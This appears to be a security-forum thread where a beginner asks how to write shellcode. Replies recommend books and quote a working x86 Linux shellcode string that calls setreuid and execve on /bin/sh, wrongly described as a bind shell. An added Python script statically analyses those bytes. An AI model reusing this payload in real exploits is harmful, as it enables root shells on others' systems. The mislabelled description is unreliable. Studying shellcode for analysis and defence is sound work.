Shell Code

    • #1961
      JJJHS13
      Participant

      Sorry, I didn’t really know where to put this question. I want to write my own shell but I have no clue where to start or which programming languages to learn. I’ve been trying to get articles from Packet Storm but they mainly just have exploits. I found a couple of articles searching the web and only got tips on securing shells, but I can’t find a decent one on how to write my own. If you could give me a starting point it would be much appreciated.

    • #15370
      Anonymous
      Participant

      Hi JJJHS13,

      You might want to learn to walk before you start running with scissors in your hand. But if you’re looking to learn about exploits and shellcode then looking at existing exploits is not a bad place to start.

      Developing exploit code is not really dependent on a specific language; you can write an exploit in Perl, Python, C or Assembly, for example. Shellcode is generally written in C and converted to ASM in order to reduce the size of the payload. If you look at one of the exploits on Milw0rm.com you will see the payload represented by something like the following:

      char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
            "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
            "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
            "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
            "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";

      This is the hex representation of the bytecode. This shellcode is for a bind shell on a Linux platform. It makes a call to execve() in order to spawn a shell using /bin/sh. Gotta love “int 0x80”!

      Obviously, writing shellcode for each OS platform is different and requires a different approach.

      There are some excellent books on the subject as well such as:

      Sockets, Shellcode, Porting and Coding by James Foster

      As for Google: try “writing shellcode” <– got me hundreds of hits.

      dean
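Added example (not part of the original post or thread): a static triage of the byte string quoted above, written in Python. It decodes the C escapes, lists each `int 0x80` together with the syscall number loaded into AL just before it, and extracts embedded strings. The function names and the small syscall table are assumptions of this example; the number-to-name mapping is for 32-bit x86 Linux.

```python
import re

# Payload bytes as posted in the thread (C string-literal escapes restored).
PAYLOAD_LITERAL = r'''
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
"\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
"\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"
'''

# Subset of i386 Linux syscall numbers (hypothetical table for this example).
I386_SYSCALLS = {0x0b: "execve", 0x46: "setreuid", 0x66: "socketcall"}


def decode_c_literal(text):
    """Turn \\xNN escapes from a C string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_syscalls(buf):
    """For each `int 0x80` (cd 80), report its offset and the operand of the
    closest preceding `mov al, imm8` (b0 NN) since the previous syscall."""
    hits = []
    start = 0
    for m in re.finditer(rb"\xcd\x80", buf):
        window = buf[start:m.start()]
        idx = window.rfind(b"\xb0")
        # Need one operand byte after b0; otherwise the number is unknown.
        nr = window[idx + 1] if 0 <= idx < len(window) - 1 else None
        hits.append((m.start(), nr, I386_SYSCALLS.get(nr, "unknown")))
        start = m.end()
    return hits


def printable_strings(buf, min_len=4):
    """Extract printable ASCII runs, like the `strings` utility."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, buf)]


if __name__ == "__main__":
    payload = decode_c_literal(PAYLOAD_LITERAL)
    print(len(payload), "bytes")
    for offset, nr, name in find_syscalls(payload):
        print(f"int 0x80 at offset {offset}: al={nr:#04x} ({name})")
    print("strings:", printable_strings(payload))
```

The `b0`/`cd 80` pairing is a byte-pattern heuristic, not a disassembly, so treat each hit as a lead to confirm in a disassembler.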

    • #15371
      JJJHS13
      Participant

      hey thanks man

    • #15372
      Clay Briggs
      Participant

      I picked up a shell code hack book earlier this year, and after the first chapter I realized that without a solid knowledge of C and assembly language I was wasting my time even reading it. It’s on my shelf until next year or so. Running with scissors is an understatement.

    • #15373
      dannioni
      Participant

      I’ve got Gray Hat Hacking this week. I haven’t read all of it, but from the Table of Contents I’d say this is just the book you’re looking for. Of course prior experience with C/C++/ASM is helpful, but you can get by without it, at least with this book.

    • #15374
      Don Donzal
      Keymaster

      If anyone wants to check out the entire chapter in Grey Hat Hacking that introduces you to coding, it’s right here on EH-Net:

      Grey Hat Hacking – Chapter 7: Programming Survival Skills

      Hope this helps,
      Don


Copyright ©2021 Caendra, Inc.
